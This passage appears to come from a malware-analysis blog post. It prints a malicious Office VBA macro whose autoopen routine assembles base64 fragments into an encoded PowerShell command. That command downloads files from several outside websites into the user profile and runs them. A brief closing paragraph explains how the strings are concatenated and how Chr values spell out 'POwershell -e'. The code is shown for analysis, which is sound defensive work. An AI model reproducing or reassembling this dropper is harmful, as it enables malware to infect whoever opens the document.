AGkAJ wArAC cAbABl ACc AKw J8cCvsJ = AnAC4 AbABhA HUAYQ BzAGk Abg BoAC4 AYwB vAG0 B8waSCi = mm44hw + o8NUEiH + jzYz573 + J6EaO6 + woo96Zz6 + zpfFBH + bOIDQsaj + J8cCvsJ B8waSCi = GEAJwArACcAZABhACcAKwAnAGYAYQByAGkAbgBnAG8AcwAnACsAJwB0AGEAcgAnACsAJwAuACcAKwAnAGMAJwArACcAbwBtAC8AJwArACcAcgB0AFEAdwBUACcAKwAnADUAJwArACcANQB6AEAAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBmAGkAJwArACcAbABlACcAKwAnAC4AbABhAHUAYQBzAGkAbgBoAC4AYwBvAG0 End Function Function BIBrlzL() On Error Resume Next LvY3XP = AJw ArA CcA LwAn ACs AJw Dcvnnls = BQAC cAK wAnAF gAZQBo AEwA JwA rACcA UAAnAC Bkabza = sAJwBQ AGw AQA AnACsA JwBo AHQAdA wbqHZhV = AnA CsA JwBw ACcA KwAnA DoAJwA rAC cALwAv AGEA nDv43V = JwArA CcAbgA nACsAJ wBn AGkAcg BhAH rWLso0 = MALgAn ACsA JwBv AHIAJ wArAC cAZw AvAH jiC3ZwNt = gAJwAr ACcAOA BCAC cAK wAnAG oAYQB NAC cAKwA NpY8wL9 = nADQ AJw ArA CcAN AAnA CsAJwA Shl9iw = 0AEkA QABoAH QAdAA nACs AJw BwACc + AKwAnA zhGozS = DoA + LwA + vAGEA + ZABzAH + UAaQB + kAGU BIBrlzL = LvY3XP + Dcvnnls + Bkabza + wbqHZhV + nDv43V + rWLso0 + jiC3ZwNt + NpY8wL9 + Shl9iw + zhGozS BIBrlzL = AJwArACcALwAnACsAJwBQACcAKwAnAFgAZQBoAEwAJwArACcAUAAnACsAJwBQAGwAQAAnACsAJwBoAHQAdAAnACsAJwBwACcAKwAnADoAJwArACcALwAvAGEAJwArACcAbgAnACsAJwBnAGkAcgBhAHMALgAnACsAJwBvAHIAJwArACcAZwAvAHgAJwArACcAOABCACcAKwAnAGoAYQBNACcAKwAnADQAJwArACcANAAnACsAJwA0AEkAQABoAHQAdAAnACsAJwBwACcAKwAnADoALwAvAGEAZABzAHUAaQBkAGU End Function Function wBuzmLiw() On Error Resume Next qc2z0SEi = ALgBjA GwAJwA rACcAd QBiA C8AeQ AnACs AJwA3A CcA Oujhvq7b = KwAnA DcAUQB UAEsA aABW AEAAa QV7zAXF = AAnAC sAJwB0 AHQ AcAAn ACsAJw A6AC8 BzjlMR1F = ALwBt AGkAY wBoA GEAZQ BsAHc Acg OQKf7zP = BpAG4 AZwBs ACcAK wAnAGU AJwArA CcAcgA uAG MAbwAn ds84PI = ACs AJw BtAC8A SQBSA FkAWQ bZjAXG = AnAC sAJwBx AFAAY gA1AC cAKwAn AE4AJw ApA C4AUwB lsk59K2 = wAGwA aQB 0ACgAJ wBA ACcA KQA7AC QAa QAw MzvEWt = ADUANQ BhAG wATw BQAD 0AK CSfGq3 = AAn AHQAcA BZA EUAM gBvACc AKw sXIO3j = AnAG 0AMQ AnAC kAOwA kAE wBuzmLiw = qc2z0SEi + Oujhvq7b + QV7zAXF + BzjlMR1F + OQKf7zP + ds84PI + bZjAXG + lsk59K2 + MzvEWt + CSfGq3 + sXIO3j wBuzmLiw = ALgBjAGwAJwArACcAdQBiAC8AeQAnACsAJwA3ACcAKwAnADcAUQBUAEsAaABWAEAAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwBtAGkAYwBoAGEAZQBsAHcAcgBpAG4AZwBsACcAKwAnAGUAJwArACcAcgAuAGMAbwAnACsAJwBtAC8ASQBSAFkAWQAnACsAJwBxAFAAYgA1ACcAKwAnAE4AJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAaQAwADUANQBhAGwATwBQAD0AKAAnAHQAcABZAEUAMgBvACcAKwAnAG0AMQAnACkAOwAkAE End Function Function Mnv94H() On Error Resume Next n8DNvz = kARQB wAEgAa gBqA CAAPQA gACgAJ wA2ADU AJwAr ACcAN AAnAC uAwdTGD5 = kAOw AkA G0AVQ B1AFc AZABG LOw02E5 = AD0A KAAnAF IAM ABhAHE AJwA rACcAM QBsAD AAJw ArACc UaU4Jz1 = ATwA nACkAO wAkA GQA RwB CAFQAb mLUvTz7 = AA0AHE APQAk AGU AbgB 2ADoAd nJIQQcw = QBzAG UAcgB wAHI Abw BmA GkA mnhC8GqR = bABlAC sAJwB cACcAK wAkAEk ARQBwA EgAa gBqAC sAKAAn WCrXbI = AC4A ZQA nACs AJwB4 AGU AJwAp ADsAZ gBvA HIAZ Mnv94H = n8DNvz + uAwdTGD5 + LOw02E5 + UaU4Jz1 + mLUvTz7 + nJIQQcw + mnhC8GqR + WCrXbI Mnv94H = kARQBwAEgAagBqACAAPQAgACgAJwA2ADUAJwArACcANAAnACkAOwAkAG0AVQB1AFcAZABGAD0AKAAnAFIAMABhAHEAJwArACcAMQBsADAAJwArACcATwAnACkAOwAkAGQARwBCAFQAbAA0AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEkARQBwAEgAagBqACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZ End Function Function Qd66bAu() On Error Resume Next l7cRfN7 = QBh AGM AaAAo ACQATQ A4AF UAMQB6 tuOdbcb = AHcAI ABpAG 4AIAAk AFA AZgB3 AEgAYw BYAFoA UwApA HsAdAB pouJSzs = yAHkA ewAk AEoARw BUADkA aQBZ AE8AY RwmuL9zj = gAuA EQAbw B3AG4 AbA BvAGEA ZABGA GkAbA d1E4tZ = BlACgA JAB NADgAV QAxA HoAd wAsA CAAJ zPOMJu0d = ABk AEcAQ gBU AGwA NABxA CkA OwAk AE8 ARA SfBGzL = B6AEQA SwA5AD MAPQA oACcA ZgAn ACs AJwBqA JnMhEm06 = EgAegB EAGwA cAAnAC sAJwA 1ACcA WuLoWdq = KQA7A EkAZgA gACgA KABHA GUA dAA tAEkA dABlA G0AI d6H2AFR = AAkA GQARw BCAF QAb AA0AHE AKQAuA GwA Qd66bAu = l7cRfN7 + tuOdbcb + pouJSzs + RwmuL9zj + d1E4tZ + zPOMJu0d + SfBGzL + JnMhEm06 + WuLoWdq + d6H2AFR Qd66bAu = QBhAGMAaAAoACQATQA4AFUAMQB6AHcAIABpAG4AIAAkAFAAZgB3AEgAYwBYAFoAUwApAHsAdAByAHkAewAkAEoARwBUADkAaQBZAE8AYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABNADgAVQAxAHoAdwAsACAAJABkAEcAQgBUAGwANABxACkAOwAkAE8ARAB6AEQASwA5ADMAPQAoACcAZgAnACsAJwBqAEgAegBEAGwAcAAnACsAJwA1ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGQARwBCAFQAbAA0AHEAKQAuAGwA End Function Function misB743q() On Error Resume Next ADNMmcl = ZQBuA GcA dABo ACAA LQBn AGUA IAA0AD AAMA AwA dUWofu = DAA KQA gAHsAS QBuA HYA sEdLvJE = bwBrAG UALQB JAHQA ZQBtAC AAJA BkAEc d5wpXhz = AQgBU AGwAN ABxA DsAJAB jADcA agBp AFEAMw A9ACg W1qwKF = AJwB 3AG kAJw ArACc AZA AyAFo AVw BZAC cAKQ misB743q = ADNMmcl + dUWofu + sEdLvJE + d5wpXhz + W1qwKF misB743q = ZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEcAQgBUAGwANABxADsAJABjADcAagBpAFEAMwA9ACgAJwB3AGkAJwArACcAZAAyAFoAVwBZACcAKQ End Function Function SvYi5Y() On Error Resume Next B6II8P = A7AG IAc gBl AGE AawA 7AH0 AfQ FckbN7Qj = BjA GEAdA BjA GgAe wB9AH 0AJ ABPAHE ASwB pDT9WTn = 3AGQ AcAA 9ACgA JwBYAE 4ASwA nACsA JwBYA EIEU9Tz = EUA SwAnA CkAO wA= SvYi5Y = B6II8P + FckbN7Qj + pDT9WTn + EIEU9Tz SvYi5Y = A7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHEASwB3AGQAcAA9ACgAJwBYAE4ASwAnACsAJwBYAEUASwAnACkAOwA= End Function Sub autoopen() On Error Resume Next pjs7kH = Chr(80) GGS8A1j = Chr(79) DsiufjK pjs7kH + GGS8A1j + UOiYERH + B8waSCi + BIBrlzL + wBuzmLiw + Mnv94H + Qd66bAu + misB743q + SvYi5Y, 0 End Sub
From here, it is pretty simple to understand and to see. Basically all the strings/variables get concatenated together to form the encoded base64 string. What I found interesting though was in the autoopen function and the fact that it was using “KeyCodeConstants” (ie: KeyCodeConstants.vbKeyP) to help build the script. This is something that I have not seen before in a script. For more information about this, see this page: http://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/keycode-constants. In those two lines, it looks like it is taking the “CHR” value (P and O respectively), converting that over to ASCII, which then gets represented as a letter. The last line is the one that puts everything together and spells out “POwershell – e” via the shell function.